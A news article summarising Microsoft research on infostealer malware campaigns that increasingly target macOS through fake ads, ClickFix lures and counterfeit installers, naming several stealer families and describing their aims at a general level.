Infostealers target macOS with fake ads and installers, Microsoft says

Microsoft has warned that information-stealing cyberattacks are increasingly targeting Apple’s macOS, marking a shift beyond their traditional focus on Windows systems as attackers adopt cross-platform tools and distribution methods.

In research published by its Defender Security Research Team on February 2, Microsoft said it had observed a rise in macOS-focused infostealer campaigns since late 2025. These operations rely on social engineering techniques, including ClickFix lures, to distribute malicious disk image installers that deploy malware families such as Atomic macOS Stealer, MacSync and DigitStealer.

According to Microsoft, the campaigns use a combination of fileless execution, native macOS utilities and AppleScript automation to steal sensitive data. The information targeted includes web browser credentials and session data, contents of the iCloud Keychain and developer-related secrets.

The attacks often begin with malicious online advertisements, frequently delivered through Google Ads, that appear in search results for legitimate software tools, including AI applications. Users are redirected to counterfeit websites designed to prompt them to install malware themselves.

Microsoft said attackers are increasingly relying on Python-based stealers because of their flexibility and ability to operate across different operating systems with minimal effort. These tools are commonly spread through phishing emails and are used to collect login details, session cookies, authentication tokens, credit card information and cryptocurrency wallet data.

One example cited by Microsoft is PXA Stealer, which the company linked to Vietnamese-speaking threat actors. The malware is capable of harvesting financial and browser data, and was observed in phishing-led campaigns in October and December 2025. In those cases, attackers used scheduled tasks or registry mechanisms to maintain persistence and relied on Telegram for command-and-control communications and data exfiltration.

Microsoft also noted that cybercriminals have used popular messaging platforms, including WhatsApp, to distribute infostealers such as Eternidade Stealer, targeting financial and cryptocurrency accounts. Other campaigns have involved fake software, such as counterfeit PDF editors, promoted through online advertising and search engine manipulation to infect Windows systems.